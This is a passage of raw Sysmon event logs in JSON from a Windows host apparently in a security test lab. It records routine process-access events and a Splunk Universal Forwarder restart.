C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.213","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2826,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.213\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.213","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2827,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.213\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.213","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2828,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.213\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.213","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2829,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.213\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.213","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2830,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010FCFB0400}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010FCFB0400}","TargetProcessId":"4920","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2831,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.235\r\nProcessGuid: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nProcessId: 4932\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=3088\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {A837DB8D-0236-5F25-0000-0010FCFB0400}\r\nParentProcessId: 4920\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: splunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=3088","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.235","ProcessGuid":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=3088","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{A837DB8D-0236-5F25-0000-0010FCFB0400}","ParentProcessId":"4920","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"splunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=3088","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2832,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-0010FCFB0400}\r\nSourceProcessId: 4920\r\nSourceThreadId: 4924\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40f97|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d40f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-0010FCFB0400}","SourceProcessId":"4920","SourceThreadId":"4924","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","TargetProcessId":"4932","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40f97|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d40f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2833,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010B8FD0400}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.228","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010B8FD0400}","TargetProcessId":"4932","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2834,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.228\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 